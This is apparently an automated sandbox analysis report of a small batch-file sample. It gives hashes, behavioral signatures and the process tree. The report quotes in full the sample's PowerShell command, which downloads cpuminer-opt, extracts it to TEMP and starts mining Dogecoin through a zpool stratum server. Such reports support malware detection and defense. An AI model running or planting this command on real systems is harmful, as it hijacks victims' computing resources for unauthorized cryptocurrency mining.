Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1794s -
max time network
1804s -
platform
windows10-1703_x64 -
resource
win10-20231215-de -
resource tags
arch:x64arch:x86image:win10-20231215-delocale:de-deos:windows10-1703-x64systemwindows -
submitted
04/02/2024, 03:24
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-de
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-de
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 212 powershell.exe 4 212 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4908 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4908 cpuminer-sse2.exe 4908 cpuminer-sse2.exe 4908 cpuminer-sse2.exe 4908 cpuminer-sse2.exe 4908 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 212 powershell.exe 212 powershell.exe 212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 212 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3820 wrote to memory of 212 3820 cmd.exe 73 PID 3820 wrote to memory of 212 3820 cmd.exe 73 PID 212 wrote to memory of 2620 212 powershell.exe 74 PID 212 wrote to memory of 2620 212 powershell.exe 74 PID 2620 wrote to memory of 4908 2620 cmd.exe 76 PID 2620 wrote to memory of 4908 2620 cmd.exe 76
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4908
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
499KB
MD596fd4c2e44809ddeddd2e2e7aa8c8aee
SHA16f22ab0f0e9d272acd65e127a1cae26f8c9d1c78
SHA256427c26a9342f29abeb37a6e46f04b37f14c1f4dbd9b1d7a28f98754634736f88
SHA512d0234451e89de4c3b5537d7a3474b0a98de5c3bc7e03a89b8d18e02d05eb76e3c6334421ce14adab9db50b7ca2bbb928dce084b3f1ff463331130a09b206772e
-
Filesize
854KB
MD5f687579a0b65082eab44acc11e92f184
SHA1bbae48ca40eedd9236e7fa7e8127ca4f347de875
SHA256225bce0a1b543af4e027e530c0818fc38834fa5ff689c7364e338643184f4e9d
SHA512e381af6ff943a927cef034cfa43e40bd1c50aa80eac7e3c33def0ee74c0821e4ae0e3a0e1985f4339c54f3bbaa204ca23a9dcf9809c38bbbeb1dd714967c0075
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
27.2MB
MD519fcc327c7f9eaf6a1fae47c9864fda7
SHA190a9ca4f4eb5bc76424b6bec0acd3df0a53b8f8c
SHA256baef1f4cabebdadc52213761b4c8e2bf381976a67bd7c490f952c38f6831b036
SHA51276d129db3006de88b851100f559fac00796f150fd6290d8f1df9f01df5bc733ebf4f4b087580d3ec81c901002d155e522954a9c1a9919cc9ca87198974a77a3a
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770